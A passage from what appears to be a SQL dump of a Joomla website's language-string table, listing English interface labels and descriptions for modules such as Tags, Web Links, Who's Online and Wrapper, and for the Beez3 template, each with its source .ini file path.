tags used on the site in a list or a cloud layout. Tags can be ordered by title or by the number of tagged items and limited to a specific time period.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3424,'MOD_TAGS_POPULAR','Tags - Popular','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.sys.ini'),(3425,'MOD_TAGS_POPULAR_LAYOUT_CLOUD','Cloud','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.sys.ini'),(3426,'MOD_TAGS_POPULAR_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.sys.ini'),(3427,'MOD_TAGS_POPULAR_XML_DESCRIPTION','This module displays tags used on the site in a list or a cloud layout. Tags can be ordered by title or by the number of tagged items and limited to a specific time period.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.sys.ini'),(3428,'MOD_TAGS_SIMILAR','Tags - Similar','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3429,'MOD_TAGS_SIMILAR_FIELD_ALL','All','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3430,'MOD_TAGS_SIMILAR_FIELD_HALF','Half','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3431,'MOD_TAGS_SIMILAR_FIELD_MATCHTYPE_DESC','How closely an item\'s tags need to match. All - requires that all tags in the displayed item be matched. Any - requires that at least one tag match. Half - requires that at least half of the tags match (rounded up in the case of decimals).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3432,'MOD_TAGS_SIMILAR_FIELD_MATCHTYPE_LABEL','Match Type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3433,'MOD_TAGS_SIMILAR_FIELD_ONE','Any','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3434,'MOD_TAGS_SIMILAR_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3435,'MOD_TAGS_SIMILAR_MAX_DESC','Maximum number of items to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3436,'MOD_TAGS_SIMILAR_MAX_LABEL','Maximum Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3437,'MOD_TAGS_SIMILAR_NO_MATCHING_TAGS','No matching tags.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3438,'MOD_TAGS_SIMILAR_XML_DESCRIPTION','The Similar Tags Module displays links to other items with similar tags. The closeness of the match can be specified.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3439,'MOD_TAGS_SIMILAR_FIELD_ORDERING_LABEL','Order Results','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3440,'MOD_TAGS_SIMILAR_FIELD_ORDERING_DESC','Select the order in which you want query results presented.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3441,'MOD_TAGS_SIMILAR_FIELD_ORDERING_COUNT','Number of matching tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3442,'MOD_TAGS_SIMILAR_FIELD_ORDERING_RANDOM','Random','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3443,'MOD_TAGS_SIMILAR_FIELD_ORDERING_COUNT_AND_RANDOM','Number of matching tags & Random','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.ini'),(3444,'MOD_TAGS_SIMILAR','Tags - Similar','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.sys.ini'),(3445,'MOD_TAGS_SIMILAR_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.sys.ini'),(3446,'MOD_TAGS_SIMILAR_XML_DESCRIPTION','The Similar Tags Module displays links to other items with similar tags. The closeness of the match can be specified.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_similar.sys.ini'),(3447,'GOOGLEMAP_MARKER','Choice image <br/>for marker','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3448,'GOOGLEMAP_MARKER_LATITUDE','Latitude<br/><a href=\'http://www.latlong.net/\' target=\'_blank\'>Generator</a>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3449,'GOOGLEMAP_MARKER_LONGITUDE','Longitude<br/><a href=\'http://www.latlong.net/\' target=\'_blank\'>Generator</a>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3450,'GOOGLEMAP_MARKER_HEIGHT','Height of the map','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3451,'GOOGLEMAP_MARKER_WIDTH','Width of the map','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3452,'GOOGLEMAP_STYLE','Paste Json style<br/>from <a href=\'https://snazzymaps.com/explore\' target=\'_blank\'>Snazzy Maps</a>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3453,'GOOGLEMAP_ZOOM','Zoom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3454,'GOOGLEMAP_USEAPI','Use API key','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3455,'GOOGLEMAP_APIKEY','Your key<br/>or <a href=\'https://developers.google.com/maps/documentation/javascript/get-api-key\' target=\'_blank\'>get key</a>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3456,'GOOGLEMAP_API_NO','No','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3457,'GOOGLEMAP_API_YES','Yes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tsimap.ini'),(3458,'MOD_USERS_LATEST','Latest Users','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3459,'MOD_USERS_LATEST_FIELD_FILTER_GROUPS_DESC','Choose to filter by groups of the connected user.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3460,'MOD_USERS_LATEST_FIELD_FILTER_GROUPS_LABEL','Filter Groups','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3461,'MOD_USERS_LATEST_FIELD_LINKTOWHAT_DESC','Choose the type of information to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3462,'MOD_USERS_LATEST_FIELD_LINKTOWHAT_LABEL','User Information','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3463,'MOD_USERS_LATEST_FIELD_NUMBER_DESC','Number of latest registered users to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3464,'MOD_USERS_LATEST_FIELD_NUMBER_LABEL','Number of Users','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3465,'MOD_USERS_LATEST_FIELD_VALUE_CONTACT','Contact','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3466,'MOD_USERS_LATEST_FIELD_VALUE_PROFILE','Profile','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3467,'MOD_USERS_LATEST_XML_DESCRIPTION','This module displays the latest registered users.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.ini'),(3468,'MOD_USERS_LATEST','Latest Users','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.sys.ini'),(3469,'MOD_USERS_LATEST_XML_DESCRIPTION','This module displays the latest registered users.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.sys.ini'),(3470,'MOD_USERS_LATEST_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_users_latest.sys.ini'),(3471,'MOD_WEBLINKS','Web Links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3472,'MOD_WEBLINKS_FIELD_CATEGORY_DESC','Choose the Web Links category to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3473,'MOD_WEBLINKS_FIELD_GROUPBY_DESC','If set to yes, web links will be grouped by subcategories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3474,'MOD_WEBLINKS_FIELD_GROUPBY_LABEL','Group By Subcategories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3475,'MOD_WEBLINKS_FIELD_GROUPBYSHOWTITLE_DESC','If set to yes, will show groups titles (valid only if grouping).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3476,'MOD_WEBLINKS_FIELD_GROUPBYSHOWTITLE_LABEL','Show Group Title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3477,'MOD_WEBLINKS_FIELD_GROUPBYORDERING_DESC','Ordering for the subcategories (valid only if grouping).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3478,'MOD_WEBLINKS_FIELD_GROUPBYORDERING_LABEL','Group Ordering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3479,'MOD_WEBLINKS_FIELD_GROUPBYDIRECTION_DESC','Direction for the subcategories (valid only if grouping).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3480,'MOD_WEBLINKS_FIELD_GROUPBYDIRECTION_LABEL','Group Ordering Direction','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3481,'MOD_WEBLINKS_FIELD_COLUMNS_DESC','When grouping by subcategories, split into # columns.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3482,'MOD_WEBLINKS_FIELD_COLUMNS_LABEL','Columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3483,'MOD_WEBLINKS_FIELD_COUNT_DESC','Number of Web Links to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3484,'MOD_WEBLINKS_FIELD_COUNT_LABEL','Count','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3485,'MOD_WEBLINKS_FIELD_COUNTCLICKS_DESC','If set to yes, the number of times the link has been clicked will be recorded.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3486,'MOD_WEBLINKS_FIELD_COUNTCLICKS_LABEL','Count Clicks','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3487,'MOD_WEBLINKS_FIELD_DESCRIPTION_DESC','Display Web Link description.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3488,'MOD_WEBLINKS_FIELD_DESCRIPTION_LABEL','Description','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3489,'MOD_WEBLINKS_FIELD_FOLLOW_DESC','Robots index - allow to follow or not.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3490,'MOD_WEBLINKS_FIELD_FOLLOW_LABEL','Follow/No Follow','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3491,'MOD_WEBLINKS_FIELD_HITS_DESC','Show hits.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3492,'MOD_WEBLINKS_FIELD_HITS_LABEL','Hits','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3493,'MOD_WEBLINKS_FIELD_ORDERDIRECTION_DESC','Set the ordering direction.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3494,'MOD_WEBLINKS_FIELD_ORDERDIRECTION_LABEL','Direction','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3495,'MOD_WEBLINKS_FIELD_ORDERING_DESC','Ordering for the Web Links.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3496,'MOD_WEBLINKS_FIELD_ORDERING_LABEL','Ordering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3497,'MOD_WEBLINKS_FIELD_TARGET_DESC','Target browser window when the link is selected.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3498,'MOD_WEBLINKS_FIELD_TARGET_LABEL','Target Window','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3499,'MOD_WEBLINKS_FIELD_VALUE_ASCENDING','Ascending','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3500,'MOD_WEBLINKS_FIELD_VALUE_DESCENDING','Descending','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3501,'MOD_WEBLINKS_FIELD_VALUE_FOLLOW','Follow','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3502,'MOD_WEBLINKS_FIELD_VALUE_HITS','Hits','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3503,'MOD_WEBLINKS_FIELD_VALUE_NOFOLLOW','No follow','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3504,'MOD_WEBLINKS_FIELD_VALUE_ORDER','Order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3505,'MOD_WEBLINKS_HITS','Hits','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3506,'MOD_WEBLINKS_XML_DESCRIPTION','This modules displays web links from a category defined in the Web Links component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.ini'),(3507,'MOD_WEBLINKS','Web Links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.sys.ini'),(3508,'MOD_WEBLINKS_XML_DESCRIPTION','This modules displays Web Links from a category defined in the Web Links component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.sys.ini'),(3509,'MOD_WEBLINKS_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_weblinks.sys.ini'),(3510,'MOD_WHOSONLINE','Who\'s Online','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3511,'MOD_WHOSONLINE_FIELD_FILTER_GROUPS_DESC','Choose to filter by groups of the connected user','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3512,'MOD_WHOSONLINE_FIELD_FILTER_GROUPS_LABEL','Filter Groups','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3513,'MOD_WHOSONLINE_FIELD_LINKTOWHAT_DESC','Choose the type of information to display','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3514,'MOD_WHOSONLINE_FIELD_LINKTOWHAT_LABEL','Information','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3515,'MOD_WHOSONLINE_FIELD_VALUE_BOTH','Both','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3516,'MOD_WHOSONLINE_FIELD_VALUE_CONTACT','Contact','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3517,'MOD_WHOSONLINE_FIELD_VALUE_NAMES','Usernames','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3518,'MOD_WHOSONLINE_FIELD_VALUE_NUMBER','# of Guests / Users','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3519,'MOD_WHOSONLINE_FIELD_VALUE_PROFILE','Profile','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3520,'MOD_WHOSONLINE_GUESTS','%s guests','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3521,'MOD_WHOSONLINE_GUESTS_1','one guest','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3522,'MOD_WHOSONLINE_GUESTS_0','no guests','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3523,'MOD_WHOSONLINE_MEMBERS','%s members','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3524,'MOD_WHOSONLINE_MEMBERS_1','one member','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3525,'MOD_WHOSONLINE_MEMBERS_0','no members','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3526,'MOD_WHOSONLINE_SAME_GROUP_MESSAGE','List of Users who belong to your user groups or your user groups\' child groups','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3527,'MOD_WHOSONLINE_SHOWMODE_DESC','Select what will be shown','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3528,'MOD_WHOSONLINE_SHOWMODE_LABEL','Display','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3529,'MOD_WHOSONLINE_XML_DESCRIPTION','The Who\'s Online Module displays the number of Anonymous Users (e.g. Guests) and Registered Users (ones logged-in) that are currently accessing the website.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3530,'MOD_WHOSONLINE_WE_HAVE','We have %1$s and %2$s online','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.ini'),(3531,'MOD_WHOSONLINE','Who\'s Online','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.sys.ini'),(3532,'MOD_WHOSONLINE_XML_DESCRIPTION','The Who\'s Online Module displays the number of Anonymous Users (Guests) and Registered Users (users logged-in) that are currently accessing the website.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.sys.ini'),(3533,'MOD_WHOSONLINE_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_whosonline.sys.ini'),(3534,'MOD_WRAPPER','Wrapper','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3535,'MOD_WRAPPER_FIELD_ADD_DESC','By default, http:// will be added unless it detects http:// or https:// in the URL you provide. This allows you to switch this ability off.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3536,'MOD_WRAPPER_FIELD_ADD_LABEL','Auto Add','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3537,'MOD_WRAPPER_FIELD_AUTOHEIGHT_DESC','The height will automatically be set to the size of the external page. This will only work for pages on your own domain.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3538,'MOD_WRAPPER_FIELD_AUTOHEIGHT_LABEL','Auto Height','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3539,'MOD_WRAPPER_FIELD_HEIGHT_DESC','Height of the iframe window.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3540,'MOD_WRAPPER_FIELD_HEIGHT_LABEL','Height','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3541,'MOD_WRAPPER_FIELD_SCROLL_DESC','Show or hide horizontal & vertical scroll bars.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3542,'MOD_WRAPPER_FIELD_SCROLL_LABEL','Scroll Bars','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3543,'MOD_WRAPPER_FIELD_TARGET_DESC','Name of the iframe when used as target.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3544,'MOD_WRAPPER_FIELD_TARGET_LABEL','Target Name','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3545,'MOD_WRAPPER_FIELD_URL_DESC','URL to site/file you wish to display within the iframe.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3546,'MOD_WRAPPER_FIELD_URL_LABEL','URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3547,'MOD_WRAPPER_FIELD_VALUE_AUTO','Auto','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3548,'MOD_WRAPPER_FIELD_WIDTH_DESC','Width of the iframe window. You can enter an absolute figure in pixels or a relative figure by adding a %.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3549,'MOD_WRAPPER_FIELD_WIDTH_LABEL','Width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3550,'MOD_WRAPPER_NO_IFRAMES','No iframes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3551,'MOD_WRAPPER_XML_DESCRIPTION','This module shows an iframe window to specified location.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3552,'MOD_WRAPPER_FIELD_FRAME_LABEL','Frame Border','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3553,'MOD_WRAPPER_FIELD_FRAME_DESC','Show frame border which wraps the iframe.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.ini'),(3554,'MOD_WRAPPER','Wrapper','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.sys.ini'),(3555,'MOD_WRAPPER_NO_IFRAMES','No iframes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.sys.ini'),(3556,'MOD_WRAPPER_XML_DESCRIPTION','This module shows an iframe window to specified location.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.sys.ini'),(3557,'MOD_WRAPPER_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_wrapper.sys.ini'),(3558,'TPL_BEEZ3_ADDITIONAL_INFORMATION','Additional information','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3559,'TPL_BEEZ3_ALTCLOSE','is closed','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3560,'TPL_BEEZ3_ALTOPEN','is open','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3561,'TPL_BEEZ3_BIGGER','Bigger','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3562,'TPL_BEEZ3_CLICK','select','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3563,'TPL_BEEZ3_CLOSEMENU','Close Menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3564,'TPL_BEEZ3_DECREASE_SIZE','Decrease size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3565,'TPL_BEEZ3_ERROR_JUMP_TO_NAV','Jump to navigation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3566,'TPL_BEEZ3_FIELD_BOOTSTRAP_DESC','Create a comma separated list of any components for which Bootstrap is needed, for example com_name, com_anothername.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3567,'TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL','Components Requiring<br /> Bootstrap','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3568,'TPL_BEEZ3_FIELD_DESCRIPTION_DESC','Please add your site description here.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3569,'TPL_BEEZ3_FIELD_DESCRIPTION_LABEL','Site Description','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3570,'TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC','Choose a colour for the Background when Custom is selected as the Template Colour. If left blank the Default (#eeeeee) is used.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3571,'TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL','Background Colour','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3572,'TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC','Select or upload an image to be used as a header image when the custom colour option is selected.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3573,'TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL','Header Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3574,'TPL_BEEZ3_FIELD_LOGO_DESC','Select or upload an image. If you do not want to display a logo, select Clear and leave the field blank.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3575,'TPL_BEEZ3_FIELD_LOGO_LABEL','Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3576,'TPL_BEEZ3_FIELD_NAVPOSITION_DESC','Navigation before or after content.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3577,'TPL_BEEZ3_FIELD_NAVPOSITION_LABEL','Position of Navigation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3578,'TPL_BEEZ3_FIELD_SITETITLE_DESC','Please add your site title here, it\'s only displayed if you don\'t use a logo.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3579,'TPL_BEEZ3_FIELD_SITETITLE_LABEL','Site Title','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3580,'TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC','Colour of the template.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3581,'TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL','Template Colour','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3582,'TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC','Wrapper width with closed additional columns in percent.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3583,'TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL','Wrapper Large (%)','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3584,'TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC','Wrapper width with opened additional columns in percent.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3585,'TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL','Wrapper Small (%)','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3586,'TPL_BEEZ3_FONTSIZE','Font Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3587,'TPL_BEEZ3_INCREASE_SIZE','Increase size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3588,'TPL_BEEZ3_JUMP_TO_INFO','Jump to additional information','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3589,'TPL_BEEZ3_JUMP_TO_NAV','Jump to main navigation and login','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3590,'TPL_BEEZ3_NAVIGATION','Navigation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3591,'TPL_BEEZ3_NAV_VIEW_SEARCH','Nav view search','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3592,'TPL_BEEZ3_NEXTTAB','Next Tab','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3593,'TPL_BEEZ3_OPENMENU','Open Menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3594,'TPL_BEEZ3_OPTION_AFTER_CONTENT','after content','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3595,'TPL_BEEZ3_OPTION_BEFORE_CONTENT','before content','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3596,'TPL_BEEZ3_OPTION_IMAGE','Custom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3597,'TPL_BEEZ3_OPTION_NATURE','Nature','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3598,'TPL_BEEZ3_OPTION_PERSONAL','Personal','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3599,'TPL_BEEZ3_OPTION_RED','Red','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3600,'TPL_BEEZ3_OPTION_TURQ','Turquoise','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3601,'TPL_BEEZ3_POWERED_BY','Powered by','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3602,'TPL_BEEZ3_RESET','Reset','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3603,'TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT','Revert styles to default','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3604,'TPL_BEEZ3_SEARCH','Search','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3605,'TPL_BEEZ3_SKIP_TO_CONTENT','Skip to content','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3606,'TPL_BEEZ3_SKIP_TO_ERROR_CONTENT','Jump to error message and search','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3607,'TPL_BEEZ3_SMALLER','Smaller','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3608,'TPL_BEEZ3_SYSTEM_MESSAGE','Error','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3609,'TPL_BEEZ3_TEXTRIGHTCLOSE','Close info','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3610,'TPL_BEEZ3_TEXTRIGHTOPEN','Open info','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3611,'TPL_BEEZ3_XML_DESCRIPTION','Accessible site template for Joomla! 3.x. Beez3, the HTML5 version.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3612,'TPL_BEEZ3_YOUR_SITE_DESCRIPTION','Your site 